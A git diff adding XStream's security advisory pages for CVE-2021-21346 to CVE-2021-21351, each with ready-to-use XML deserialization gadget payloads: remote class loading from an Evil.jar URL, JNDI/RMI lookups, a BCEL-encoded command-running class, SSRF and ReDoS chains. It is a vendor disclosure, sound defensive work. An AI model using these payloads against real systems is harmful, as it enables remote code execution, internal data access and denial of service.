+ <string>UTF-8</string>
+ </localNames>
+ </nameList>
+ </context>
+ </bridge>
+ </bridge>
+ <jaxbObject class='com.sun.corba.se.impl.activation.ServerTableEntry'>
+ <activationCmd>calc</activationCmd>
+ </jaxbObject>
+ </dataSource>
+ </message>
+ <satellites/>
+ <invocationProperties/>
+ </packet>
+ </indexMap>
+ </comparator>
+ </default>
+ <int>3</int>
+ <string>javax.xml.ws.binding.attachments.inbound</string>
+ <string>javax.xml.ws.binding.attachments.inbound</string>
+ </java.util.PriorityQueue>
+</java.util.PriorityQueue>
+</pre></div>
+<div class="Source Java"><pre>XStream xstream = new XStream();
+xstream.fromXML(xml);
+</pre></div>
+
+ <p>As soon as the XML gets unmarshalled, the payload gets executed and the command is executed on the host.</p>
+
+ <p>Note, this example uses XML, but the attack can be performed for any supported format. e.g. JSON.</p>
+
+ <h2 id="impact">Impact</h2>
+
+ <p>The vulnerability may allow a remote attacker has sufficient rights to execute commands of the host only by
+ manipulating the processed input stream.</p>
+
+ <h2 id="workarounds">Workarounds</h2>
+
+ <p>See <a href="security.html#workaround">workarounds</a> for the different versions covering all CVEs.</p>
+
+ <h2 id="credits">Credits</h2>
+
+ <p>钟潦贵 (Liaogui Zhong) found and reported the issue to XStream and provided the required information to reproduce it.</p>
+
+ </body>
+ </html>
diff --git a/xstream-distribution/src/content/CVE-2021-21346.html b/xstream-distribution/src/content/CVE-2021-21346.html
new file mode 100644
index 0000000000000000000000000000000000000000..c57cb13c02575d57fcc051ab8b81654bfc024dc9
--- /dev/null
+++ b/xstream-distribution/src/content/CVE-2021-21346.html
@@ -0,0 +1,119 @@
+<html>
+<!--
+ Copyright (C) 2021 XStream committers.
+ All rights reserved.
+
+ The software in this package is published under the terms of the BSD
+ style license a copy of which has been included with this distribution in
+ the LICENSE.txt file.
+
+ Created on 29. January 2021 by Joerg Schaible
+ -->
+ <head>
+ <title>CVE-2021-21346</title>
+ </head>
+ <body>
+
+ <h2 id="vulnerability">Vulnerability</h2>
+
+ <p>CVE-2021-21346: XStream is vulnerable to an Arbitrary Code Execution attack.</p>
+
+ <h2 id="affected_versions">Affected Versions</h2>
+
+ <p>All versions until and including version 1.4.15 are affected, if using the version out of the box. No user is
+ affected, who followed the recommendation to setup <a href="security.html#framework">XStream's security
+ framework</a> with a whitelist limited to the minimal required types.</p>
+
+ <h2 id="description">Description</h2>
+
+ <p>The processed stream at unmarshalling time contains type information to recreate the formerly written objects.
+ XStream creates therefore new instances based on these type information. An attacker can manipulate the processed
+ input stream and replace or inject objects, that result in execution of arbitrary code loaded from a remote server.</p>
+
+ <h2 id="reproduction">Steps to Reproduce</h2>
+
+ <p>Create a simple TreeSet and use XStream to marshal it to XML. Replace the XML with following snippet and
+ unmarshal it again with XStream:</p>
+<div class="Source XML"><pre><sorted-set>
+ <javax.naming.ldap.Rdn_-RdnEntry>
+ <type>ysomap</type>
+ <value class='javax.swing.MultiUIDefaults' serialization='custom'>
+ <unserializable-parents/>
+ <hashtable>
+ <default>
+ <loadFactor>0.75</loadFactor>
+ <threshold>525</threshold>
+ </default>
+ <int>700</int>
+ <int>0</int>
+ </hashtable>
+ <javax.swing.UIDefaults>
+ <default>
+ <defaultLocale>zh_CN</defaultLocale>
+ <resourceCache/>
+ </default>
+ </javax.swing.UIDefaults>
+ <javax.swing.MultiUIDefaults>
+ <default>
+ <tables>
+ <javax.swing.UIDefaults serialization='custom'>
+ <unserializable-parents/>
+ <hashtable>
+ <default>
+ <loadFactor>0.75</loadFactor>
+ <threshold>525</threshold>
+ </default>
+ <int>700</int>
+ <int>1</int>
+ <sun.swing.SwingLazyValue>
+ <className>javax.naming.InitialContext</className>
+ <methodName>doLookup</methodName>
+ <args>
+ <arg>ldap://localhost:1099/CallRemoteMethod</arg>
+ </args>
+ </sun.swing.SwingLazyValue>
+ </hashtable>
+ <javax.swing.UIDefaults>
+ <default>
+ <defaultLocale reference='../../../../../../../javax.swing.UIDefaults/default/defaultLocale'/>
+ <resourceCache/>
+ </default>
+ </javax.swing.UIDefaults>
+ </javax.swing.UIDefaults>
+ </tables>
+ </default>
+ </javax.swing.MultiUIDefaults>
+ </value>
+ </javax.naming.ldap.Rdn_-RdnEntry>
+ <javax.naming.ldap.Rdn_-RdnEntry>
+ <type>ysomap</type>
+ <value class='com.sun.org.apache.xpath.internal.objects.XString'>
+ <m__obj class='string'>test</m__obj>
+ </value>
+ </javax.naming.ldap.Rdn_-RdnEntry>
+</sorted-set>
+</pre></div>
+<div class="Source Java"><pre>XStream xstream = new XStream();
+xstream.fromXML(xml);
+</pre></div>
+
+ <p>Depending on the JDK, the code from the remote server is executed as soon as the XML gets unmarshalled or when
+ another element is added to the set.</p>
+
+ <p>Note, this example uses XML, but the attack can be performed for any supported format. e.g. JSON.</p>
+
+ <h2 id="impact">Impact</h2>
+
+ <p>The vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by
+ manipulating the processed input stream.</p>
+
+ <h2 id="workarounds">Workarounds</h2>
+
+ <p>See <a href="security.html#workaround">workarounds</a> for the different versions covering all CVEs.</p>
+
+ <h2 id="credits">Credits</h2>
+
+ <p>wh1t3p1g G5-RD6@IIE found and reported the issue to XStream and provided the required information to reproduce it.</p>
+
+ </body>
+ </html>
diff --git a/xstream-distribution/src/content/CVE-2021-21347.html b/xstream-distribution/src/content/CVE-2021-21347.html
new file mode 100644
index 0000000000000000000000000000000000000000..693e35c68d172bab237bf6ad456d5e0f64261a1d
--- /dev/null
+++ b/xstream-distribution/src/content/CVE-2021-21347.html
@@ -0,0 +1,138 @@
+<html>
+<!--
+ Copyright (C) 2021 XStream committers.
+ All rights reserved.
+
+ The software in this package is published under the terms of the BSD
+ style license a copy of which has been included with this distribution in
+ the LICENSE.txt file.
+
+ Created on 2. February 2021 by Joerg Schaible
+ -->
+ <head>
+ <title>CVE-2021-21347</title>
+ </head>
+ <body>
+
+ <h2 id="vulnerability">Vulnerability</h2>
+
+ <p>CVE-2021-21347: XStream is vulnerable to an Arbitrary Code Execution attack.</p>
+
+ <h2 id="affected_versions">Affected Versions</h2>
+
+ <p>All versions until and including version 1.4.15 are affected, if using the version out of the box. No user is
+ affected, who followed the recommendation to setup <a href="security.html#framework">XStream's security
+ framework</a> with a whitelist limited to the minimal required types.</p>
+
+ <h2 id="description">Description</h2>
+
+ <p>The processed stream at unmarshalling time contains type information to recreate the formerly written objects.
+ XStream creates therefore new instances based on these type information. An attacker can manipulate the processed
+ input stream and replace or inject objects, that result in execution of arbitrary code loaded from a remote server.</p>
+
+ <h2 id="reproduction">Steps to Reproduce</h2>
+
+ <p>Create a simple PriorityQueue and use XStream to marshal it to XML. Replace the XML with following snippet and
+ unmarshal it again with XStream:</p>
+<div class="Source XML"><pre><java.util.PriorityQueue serialization='custom'>
+ <unserializable-parents/>
+ <java.util.PriorityQueue>
+ <default>
+ <size>2</size>
+ <comparator class='javafx.collections.ObservableList$1'/>
+ </default>
+ <int>3</int>
+ <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>
+ <dataHandler>
+ <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>
+ <contentType>text/plain</contentType>
+ <is class='java.io.SequenceInputStream'>
+ <e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>
+ <iterator class='com.sun.tools.javac.processing.JavacProcessingEnvironment$NameProcessIterator'>
+ <names class='java.util.AbstractList$Itr'>
+ <cursor>0</cursor>
+ <lastRet>-1</lastRet>
+ <expectedModCount>0</expectedModCount>
+ <outer-class class='java.util.Arrays$ArrayList'>
+ <a class='string-array'>
+ <string>Evil</string>
+ </a>
+ </outer-class>
+ </names>
+ <processorCL class='java.net.URLClassLoader'>
+ <ucp class='sun.misc.URLClassPath'>
+ <urls serialization='custom'>
+ <unserializable-parents/>
+ <vector>
+ <default>
+ <capacityIncrement>0</capacityIncrement>
+ <elementCount>1</elementCount>
+ <elementData>
+ <url>http://127.0.0.1:80/Evil.jar</url>
+ </elementData>
+ </default>
+ </vector>
+ </urls>
+ <path>
+ <url>http://127.0.0.1:80/Evil.jar</url>
+ </path>
+ <loaders/>
+ <lmap/>
+ </ucp>
+ <package2certs class='concurrent-hash-map'/>
+ <classes/>
+ <defaultDomain>
+ <classloader class='java.net.URLClassLoader' reference='../..'/>
+ <principals/>
+ <hasAllPerm>false</hasAllPerm>
+ <staticPermissions>false</staticPermissions>
+ <key>
+ <outer-class reference='../..'/>
+ </key>
+ </defaultDomain>
+ <initialized>true</initialized>
+ <pdcache/>
+ </processorCL>
+ </iterator>
+ <type>KEYS</type>
+ </e>
+ <in class='java.io.ByteArrayInputStream'>
+ <buf></buf>
+ <pos>-2147483648</pos>
+ <mark>0</mark>
+ <count>0</count>
+ </in>
+ </is>
+ <consumed>false</consumed>
+ </dataSource>
+ <transferFlavors/>
+ </dataHandler>
+ <dataLen>0</dataLen>
+ </com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>
+ <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data reference='../com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'/>
+ </java.util.PriorityQueue>
+</java.util.PriorityQueue>
+</pre></div>
+<div class="Source Java"><pre>XStream xstream = new XStream();
+xstream.fromXML(xml);
+</pre></div>
+
+ <p>As soon as the XML gets unmarshalled, the code from the remote server is loaded and executed.</p>
+
+ <p>Note, this example uses XML, but the attack can be performed for any supported format. e.g. JSON.</p>
+
+ <h2 id="impact">Impact</h2>
+
+ <p>The vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by
+ manipulating the processed input stream.</p>
+
+ <h2 id="workarounds">Workarounds</h2>
+
+ <p>See <a href="security.html#workaround">workarounds</a> for the different versions covering all CVEs.</p>
+
+ <h2 id="credits">Credits</h2>
+
+ <p>The vulnerability was discovered and reported by threedr3am.</p>
+
+ </body>
+ </html>
diff --git a/xstream-distribution/src/content/CVE-2021-21348.html b/xstream-distribution/src/content/CVE-2021-21348.html
new file mode 100644
index 0000000000000000000000000000000000000000..c961b0d672bea351d42ffb23cc6a14dec60ecc36
--- /dev/null
+++ b/xstream-distribution/src/content/CVE-2021-21348.html
@@ -0,0 +1,138 @@
+<html>
+<!--
+ Copyright (C) 2021 XStream committers.
+ All rights reserved.
+
+ The software in this package is published under the terms of the BSD
+ style license a copy of which has been included with this distribution in
+ the LICENSE.txt file.
+
+ Created on 19. February 2021 by Joerg Schaible
+ -->
+ <head>
+ <title>CVE-2021-21348</title>
+ </head>
+ <body>
+
+ <h2 id="vulnerability">Vulnerability</h2>
+
+ <p>CVE-2021-21348: XStream is vulnerable to an attack using Regular Expression for a Denial of Service (ReDos).</p>
+
+ <h2 id="affected_versions">Affected Versions</h2>
+
+ <p>All versions until and including version 1.4.15 are affected, if using the version out of the box. No user is
+ affected, who followed the recommendation to setup <a href="security.html#framework">XStream's security
+ framework</a> with a whitelist limited to the minimal required types.</p>
+
+ <h2 id="description">Description</h2>
+
+ <p>The processed stream at unmarshalling time contains type information to recreate the formerly written objects.
+ XStream creates therefore new instances based on these type information. An attacker can manipulate the processed
+ input stream and replace or inject objects, that result in executed evaluation of a malicious regular expression
+ causing a denial of service.</p>
+
+ <h2 id="reproduction">Steps to Reproduce</h2>
+
+ <p>Create a simple PriorityQueue and use XStream to marshal it to XML. Replace the XML with following snippet and
+ unmarshal it again with XStream:</p>
+<div class="Source XML"><pre><java.util.PriorityQueue serialization='custom'>
+ <unserializable-parents/>
+ <java.util.PriorityQueue>
+ <default>
+ <size>2</size>
+ <comparator class='javafx.collections.ObservableList$1'/>
+ </default>
+ <int>3</int>
+ <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>
+ <dataHandler>
+ <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>
+ <contentType>text/plain</contentType>
+ <is class='java.io.SequenceInputStream'>
+ <e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>
+ <iterator class='java.util.Scanner'>
+ <buf class='java.nio.HeapCharBuffer'>
+ <mark>-1</mark>
+ <position>0</position>
+ <limit>0</limit>
+ <capacity>1024</capacity>
+ <address>0</address>
+ <hb></hb>
+ <offset>0</offset>
+ <isReadOnly>false</isReadOnly>
+ </buf>
+ <position>0</position>
+ <matcher>
+ <parentPattern>
+ <pattern>\p{javaWhitespace}+</pattern>
+ <flags>0</flags>
+ </parentPattern>
+ <from>0</from>
+ <to>0</to>
+ <lookbehindTo>0</lookbehindTo>
+ <text class='java.nio.HeapCharBuffer' reference='../../buf'/>
+ <acceptMode>0</acceptMode>
+ <first>-1</first>
+ <last>0</last>
+ <oldLast>-1</oldLast>
+ <lastAppendPosition>0</lastAppendPosition>
+ <locals/>
+ <hitEnd>false</hitEnd>
+ <requireEnd>false</requireEnd>
+ <transparentBounds>true</transparentBounds>
+ <anchoringBounds>false</anchoringBounds>
+ </matcher>
+ <delimPattern>
+ <pattern>(x+)*y</pattern>
+ <flags>0</flags>
+ </delimPattern>
+ <hasNextPosition>0</hasNextPosition>
+ <source class='java.io.StringReader'>
+ <lock class='java.io.StringReader' reference='..'/>
+ <str>xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx</str>
+ <length>32</length>
+ <next>0</next>
+ <mark>0</mark>
+ </source>
+ </iterator>
+ <type>KEYS</type>
+ </e>
+ <in class='java.io.ByteArrayInputStream'>
+ <buf></buf>
+ <pos>0</pos>
+ <mark>0</mark>
+ <count>0</count>
+ </in>
+ </is>
+ <consumed>false</consumed>
+ </dataSource>
+ <transferFlavors/>
+ </dataHandler>
+ <dataLen>0</dataLen>
+ </com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>
+ <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data reference='../com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'/>
+ </java.util.PriorityQueue>
+</java.util.PriorityQueue>
+</pre></div>
+<div class="Source Java"><pre>XStream xstream = new XStream();
+xstream.fromXML(xml);
+</pre></div>
+
+ <p>As soon as the XML gets unmarshalled, the malicious regular expression is evaluated and causes a denial of service.</p>
+
+ <p>Note, this example uses XML, but the attack can be performed for any supported format. e.g. JSON.</p>
+
+ <h2 id="impact">Impact</h2>
+
+ <p>The vulnerability may allow a remote attacker to occupy a thread that consumes maximum CPU time and will never
+ return.</p>
+
+ <h2 id="workarounds">Workarounds</h2>
+
+ <p>See <a href="security.html#workaround">workarounds</a> for the different versions covering all CVEs.</p>
+
+ <h2 id="credits">Credits</h2>
+
+ <p>The vulnerability was discovered and reported by threedr3am.</p>
+
+ </body>
+ </html>
diff --git a/xstream-distribution/src/content/CVE-2021-21349.html b/xstream-distribution/src/content/CVE-2021-21349.html
new file mode 100644
index 0000000000000000000000000000000000000000..2bb581773490bc9749cd6a516d3cc95a6fb13455
--- /dev/null
+++ b/xstream-distribution/src/content/CVE-2021-21349.html
@@ -0,0 +1,106 @@
+<html>
+<!--
+ Copyright (C) 2021 XStream committers.
+ All rights reserved.
+
+ The software in this package is published under the terms of the BSD
+ style license a copy of which has been included with this distribution in
+ the LICENSE.txt file.
+
+ Created on 20. February 2021 by Joerg Schaible
+ -->
+ <head>
+ <title>CVE-2021-21349</title>
+ </head>
+ <body>
+
+ <h2 id="vulnerability">Vulnerability</h2>
+
+ <p>CVE-2021-21349: A Server-Side Forgery Request can be activated unmarshalling with XStream to access data streams
+ from an arbitrary URL referencing a resource in an intranet or the local host.</p>
+
+ <h2 id="affected_versions">Affected Versions</h2>
+
+ <p>All versions until and including version 1.4.15 are affected, if using the version out of the box. No user is
+ affected, who followed the recommendation to setup <a href="security.html#framework">XStream's security
+ framework</a> with a whitelist limited to the minimal required types.</p>
+
+ <h2 id="description">Description</h2>
+
+ <p>The processed stream at unmarshalling time contains type information to recreate the formerly written objects.
+ XStream creates therefore new instances based on these type information. An attacker can manipulate the processed
+ input stream and replace or inject objects, that result in a server-side forgery request.</p>
+
+ <h2 id="reproduction">Steps to Reproduce</h2>
+
+ <p>Create a simple PriorityQueue and use XStream to marshal it to XML. Replace the XML with following snippet and
+ unmarshal it again with XStream:</p>
+<div class="Source XML"><pre><java.util.PriorityQueue serialization='custom'>
+ <unserializable-parents/>
+ <java.util.PriorityQueue>
+ <default>
+ <size>2</size>
+ <comparator class='javafx.collections.ObservableList$1'/>
+ </default>
+ <int>3</int>
+ <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>
+ <dataHandler>
+ <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>
+ <contentType>text/plain</contentType>
+ <is class='java.io.SequenceInputStream'>
+ <e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>
+ <iterator class='com.sun.xml.internal.ws.util.ServiceFinder$ServiceNameIterator'>
+ <configs class='sun.misc.FIFOQueueEnumerator'>
+ <queue>
+ <length>1</length>
+ <head>
+ <obj class='url'>http://localhost:8080/internal/</obj>
+ </head>
+ <tail reference='../head'/>
+ </queue>
+ <cursor reference='../queue/head'/>
+ </configs>
+ <returned class='sorted-set'/>
+ </iterator>
+ <type>KEYS</type>
+ </e>
+ <in class='java.io.ByteArrayInputStream'>
+ <buf></buf>
+ <pos>0</pos>
+ <mark>0</mark>
+ <count>0</count>
+ </in>
+ </is>
+ <consumed>false</consumed>
+ </dataSource>
+ <transferFlavors/>
+ </dataHandler>
+ <dataLen>0</dataLen>
+ </com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>
+ <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data reference='../com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'/>
+ </java.util.PriorityQueue>
+</java.util.PriorityQueue>
+</pre></div>
+<div class="Source Java"><pre>XStream xstream = new XStream();
+xstream.fromXML(xml);
+</pre></div>
+
+ <p>As soon as the XML gets unmarshalled, the payload gets executed and the data from the URL location is collected.</p>
+
+ <p>Note, this example uses XML, but the attack can be performed for any supported format. e.g. JSON.</p>
+
+ <h2 id="impact">Impact</h2>
+
+ <p>The vulnerability may allow a remote attacker to request data from internal resources that are not publicly
+ available only by manipulating the processed input stream.</p>
+
+ <h2 id="workarounds">Workarounds</h2>
+
+ <p>See <a href="security.html#workaround">workarounds</a> for the different versions covering all CVEs.</p>
+
+ <h2 id="credits">Credits</h2>
+
+ <p>The vulnerability was discovered and reported by threedr3am.</p>
+
+ </body>
+ </html>
diff --git a/xstream-distribution/src/content/CVE-2021-21350.html b/xstream-distribution/src/content/CVE-2021-21350.html
new file mode 100644
index 0000000000000000000000000000000000000000..94cbc8bc0d85ada388b1a56a1073fcfcd6dd1cbb
--- /dev/null
+++ b/xstream-distribution/src/content/CVE-2021-21350.html
@@ -0,0 +1,164 @@
+<html>
+<!--
+ Copyright (C) 2021 XStream committers.
+ All rights reserved.
+
+ The software in this package is published under the terms of the BSD
+ style license a copy of which has been included with this distribution in
+ the LICENSE.txt file.
+
+ Created on 20. February 2021 by Joerg Schaible
+ -->
+ <head>
+ <title>CVE-2021-21350</title>
+ </head>
+ <body>
+
+ <h2 id="vulnerability">Vulnerability</h2>
+
+ <p>CVE-2021-21350: XStream is vulnerable to an Arbitrary Code Execution attack.</p>
+
+ <h2 id="affected_versions">Affected Versions</h2>
+
+ <p>All versions until and including version 1.4.15 are affected, if using the version out of the box. No user is
+ affected, who followed the recommendation to setup <a href="security.html#framework">XStream's security
+ framework</a> with a whitelist limited to the minimal required types.</p>
+
+ <h2 id="description">Description</h2>
+
+ <p>The processed stream at unmarshalling time contains type information to recreate the formerly written objects.
+ XStream creates therefore new instances based on these type information. An attacker can manipulate the processed
+ input stream and replace or inject objects, that result in an arbitrary code execution.</p>
+
+ <h2 id="reproduction">Steps to Reproduce</h2>
+
+ <p>Create a simple PriorityQueue and use XStream to marshal it to XML. Replace the XML with following snippet and
+ unmarshal it again with XStream:</p>
+<div class="Source XML"><pre><java.util.PriorityQueue serialization='custom'>
+ <unserializable-parents/>
+ <java.util.PriorityQueue>
+ <default>
+ <size>2</size>
+ <comparator class='javafx.collections.ObservableList$1'/>
+ </default>
+ <int>3</int>
+ <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>
+ <dataHandler>
+ <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>
+ <contentType>text/plain</contentType>
+ <is class='java.io.SequenceInputStream'>
+ <e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>
+ <iterator class='com.sun.tools.javac.processing.JavacProcessingEnvironment$NameProcessIterator'>
+ <names class='java.util.AbstractList$Itr'>
+ <cursor>0</cursor>
+ <lastRet>-1</lastRet>
+ <expectedModCount>0</expectedModCount>
+ <outer-class class='java.util.Arrays$ArrayList'>
+ <a class='string-array'>
+ <string>$$BCEL$$$l$8b$I$A$A$A$A$A$A$AeQ$ddN$c20$Y$3d$85$c9$60$O$e5G$fcW$f0J0Qn$bc$c3$Y$T$83$89$c9$oF$M$5e$97$d9$60$c9X$c9$d6$R$5e$cb$h5$5e$f8$A$3e$94$f1$x$g$q$b1MwrN$cf$f9$be$b6$fb$fcz$ff$Ap$8a$aa$83$MJ$O$caX$cb$a2bp$dd$c6$86$MM$86$cc$99$M$a5$3egH$d7$h$3d$G$ebR$3d$K$86UO$86$e2$s$Z$f5Et$cf$fb$B$v$rO$f9$3c$e8$f1H$g$fe$xZ$faI$c6T$c3kOd$d0bp$daS_$8c$b5Talc$8bxW$r$91$_$ae$a41$e7$8c$e9d$c8$t$dc$85$8d$ac$8dm$X$3b$d8$a5$d2j$y$c2$da1$afQ$D$3f$J$b8V$91$8b$3d$ecS$7d$Ta$u$98P3$e0$e1$a0$d9$e9$P$85$af$Z$ca3I$aa$e6ug$de$93$a1$f8g$bcKB$zG$d4$d6$Z$I$3d$t$95z$c3$fb$e7$a1$83$5bb$w$7c$86$c3$fa$c2nWG2$i$b4$W$D$b7$91$f2E$i$b7p$80$rzQ3$YM$ba$NR$c8$R$bb$md$84$xG$af$60oH$95$d2$_$b0$k$9eII$c11$3a$d2$f4$cd$c2$ow$9e$94eb$eeO$820$3fC$d0$$$fd$BZ$85Y$ae$f8$N$93$85$cf$5c$c7$B$A$A</string>
+ </a>
+ </outer-class>
+ </names>
+ <processorCL class='com.sun.org.apache.bcel.internal.util.ClassLoader'>
+ <parent class='sun.misc.Launcher$ExtClassLoader'>
+ </parent>
+ <package2certs class='hashtable'/>
+ <classes defined-in='java.lang.ClassLoader'/>
+ <defaultDomain>
+ <classloader class='com.sun.org.apache.bcel.internal.util.ClassLoader' reference='../..'/>
+ <principals/>
+ <hasAllPerm>false</hasAllPerm>
+ <staticPermissions>false</staticPermissions>
+ <key>
+ <outer-class reference='../..'/>
+ </key>
+ </defaultDomain>
+ <packages/>
+ <nativeLibraries/>
+ <assertionLock class='com.sun.org.apache.bcel.internal.util.ClassLoader' reference='..'/>
+ <defaultAssertionStatus>false</defaultAssertionStatus>
+ <classes/>
+ <ignored__packages>
+ <string>java.</string>
+ <string>javax.</string>
+ <string>sun.</string>
+ </ignored__packages>
+ <repository class='com.sun.org.apache.bcel.internal.util.SyntheticRepository'>
+ <__path>
+ <paths/>
+ <class__path>.</class__path>
+ </__path>
+ <__loadedClasses/>
+ </repository>
+ <deferTo class='sun.misc.Launcher$ExtClassLoader' reference='../parent'/>
+ </processorCL>
+ </iterator>
+ <type>KEYS</type>
+ </e>
+ <in class='java.io.ByteArrayInputStream'>
+ <buf></buf>
+ <pos>0</pos>
+ <mark>0</mark>
+ <count>0</count>
+ </in>
+ </is>
+ <consumed>false</consumed>
+ </dataSource>
+ <transferFlavors/>
+ </dataHandler>
+ <dataLen>0</dataLen>
+ </com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>
+ <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data reference='../com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'/>
+ </java.util.PriorityQueue>
+</java.util.PriorityQueue>
+</pre></div>
+
+ <p>The payload has been directly injected and was generated by following code:</p>
+
+<div class="Source Java"><pre>import com.sun.org.apache.bcel.internal.classfile.Utility;
+import java.io.IOException;
+import java.io.InputStream;
+
+/**
+ * @author threedr3am
+ */
+public class Evil {
+
+ public Evil() throws IOException {
+ Runtime.getRuntime().exec("open -a calculator");
+ }
+
+ public static void main(String[] args) throws IOException {
+ InputStream inputStream = Evil.class.getResourceAsStream("Evil.class");
+ byte[] bytes = new byte[inputStream.available()];
inputStream.read(bytes);
+ String code = Utility.encode(bytes, true);
+ String bcel = "$$BCEL$$" + code;
+ System.out.println(bcel);
+ }
+}
+</pre></div>
+
+<div class="Source Java"><pre>XStream xstream = new XStream();
+xstream.fromXML(xml);
+</pre></div>
+
+ <p>As soon as the XML gets unmarshalled, the payload with the injected code gets executed.</p>
+
+ <p>Note, this example uses XML, but the attack can be performed for any supported format. e.g. JSON.</p>
+
+ <h2 id="impact">Impact</h2>
+
+ <p>The vulnerability may allow a remote attacker to execute arbitrary code only by manipulating the processed
+ input stream.</p>
+
+ <h2 id="workarounds">Workarounds</h2>
+
+ <p>See <a href="security.html#workaround">workarounds</a> for the different versions covering all CVEs.</p>
+
+ <h2 id="credits">Credits</h2>
+
+ <p>The vulnerability was discovered and reported by threedr3am.</p>
+
+ </body>
+ </html>
diff --git a/xstream-distribution/src/content/CVE-2021-21351.html b/xstream-distribution/src/content/CVE-2021-21351.html
new file mode 100644
index 0000000000000000000000000000000000000000..4e2e502723be7e1b0993cb7bb3399a2ff9ef052d
--- /dev/null
+++ b/xstream-distribution/src/content/CVE-2021-21351.html
@@ -0,0 +1,135 @@
+<html>
+<!--
+ Copyright (C) 2021 XStream committers.
+ All rights reserved.
+
+ The software in this package is published under the terms of the BSD
+ style license a copy of which has been included with this distribution in
+ the LICENSE.txt file.
+
+ Created on 27. February 2021 by Joerg Schaible
+ -->
+ <head>
+ <title>CVE-2021-21351</title>
+ </head>
+ <body>
+
+ <h2 id="vulnerability">Vulnerability</h2>
+
+ <p>CVE-2021-21351: XStream is vulnerable to an Arbitrary Code Execution attack.</p>
+
+ <h2 id="affected_versions">Affected Versions</h2>
+
+ <p>All versions until and including version 1.4.15 are affected, if using the version out of the box. No user is
+ affected, who followed the recommendation to setup <a href="security.html#framework">XStream's security
+ framework</a> with a whitelist limited to the minimal required types.</p>
+
+ <h2 id="description">Description</h2>
+
+ <p>The processed stream at unmarshalling time contains type information to recreate the formerly written objects.
+ XStream creates therefore new instances based on these type information. An attacker can manipulate the processed
+ input stream and replace or inject objects, that result in execution of arbitrary code loaded from a remote server.</p>
+
+ <h2 id="reproduction">Steps to Reproduce</h2>
+
+ <p>Create a simple TreeSet and use XStream to marshal it to XML. Replace the XML with following snippet and
+ unmarshal it again with XStream:</p>
+<div class="Source XML"><pre><sorted-set>
+ <javax.naming.ldap.Rdn_-RdnEntry>
+ <type>ysomap</type>
+ <value class='com.sun.org.apache.xpath.internal.objects.XRTreeFrag'>
+ <m__DTMXRTreeFrag>
+ <m__dtm class='com.sun.org.apache.xml.internal.dtm.ref.sax2dtm.SAX2DTM'>
+ <m__size>-10086</m__size>
+ <m__mgrDefault>
+ <__overrideDefaultParser>false</__overrideDefaultParser>
+ <m__incremental>false</m__incremental>
+ <m__source__location>false</m__source__location>
+ <m__dtms>
+ <null/>
+ </m__dtms>
+ <m__defaultHandler/>
+ </m__mgrDefault>
+ <m__shouldStripWS>false</m__shouldStripWS>
+ <m__indexing>false</m__indexing>
+ <m__incrementalSAXSource class='com.sun.org.apache.xml.internal.dtm.ref.IncrementalSAXSource_Xerces'>
+ <fPullParserConfig class='com.sun.rowset.JdbcRowSetImpl' serialization='custom'>
+ <javax.sql.rowset.BaseRowSet>
+ <default>
+ <concurrency>1008</concurrency>
+ <escapeProcessing>true</escapeProcessing>
+ <fetchDir>1000</fetchDir>
+ <fetchSize>0</fetchSize>
+ <isolation>2</isolation>
+ <maxFieldSize>0</maxFieldSize>
+ <maxRows>0</maxRows>
+ <queryTimeout>0</queryTimeout>
+ <readOnly>true</readOnly>
+ <rowSetType>1004</rowSetType>
+ <showDeleted>false</showDeleted>
+ <dataSource>rmi://localhost:15000/CallRemoteMethod</dataSource>
+ <listeners/>
+ <params/>
+ </default>
+ </javax.sql.rowset.BaseRowSet>
+ <com.sun.rowset.JdbcRowSetImpl>
+ <default/>
+ </com.sun.rowset.JdbcRowSetImpl>
+ </fPullParserConfig>
+ <fConfigSetInput>
+ <class>com.sun.rowset.JdbcRowSetImpl</class>
+ <name>setAutoCommit</name>
+ <parameter-types>
+ <class>boolean</class>
+ </parameter-types>
+ </fConfigSetInput>
+ <fConfigParse reference='../fConfigSetInput'/>
+ <fParseInProgress>false</fParseInProgress>
+ </m__incrementalSAXSource>
+ <m__walker>
+ <nextIsRaw>false</nextIsRaw>
+ </m__walker>
+ <m__endDocumentOccured>false</m__endDocumentOccured>
+ <m__idAttributes/>
+ <m__textPendingStart>-1</m__textPendingStart>
+ <m__useSourceLocationProperty>false</m__useSourceLocationProperty>
+ <m__pastFirstElement>false</m__pastFirstElement>
+ </m__dtm>
+ <m__dtmIdentity>1</m__dtmIdentity>
+ </m__DTMXRTreeFrag>
+ <m__dtmRoot>1</m__dtmRoot>
+ <m__allowRelease>false</m__allowRelease>
+ </value>
+ </javax.naming.ldap.Rdn_-RdnEntry>
+ <javax.naming.ldap.Rdn_-RdnEntry>
+ <type>ysomap</type>
+ <value class='com.sun.org.apache.xpath.internal.objects.XString'>
+ <m__obj class='string'>test</m__obj>
+ </value>
+ </javax.naming.ldap.Rdn_-RdnEntry>
+</sorted-set>
+</pre></div>
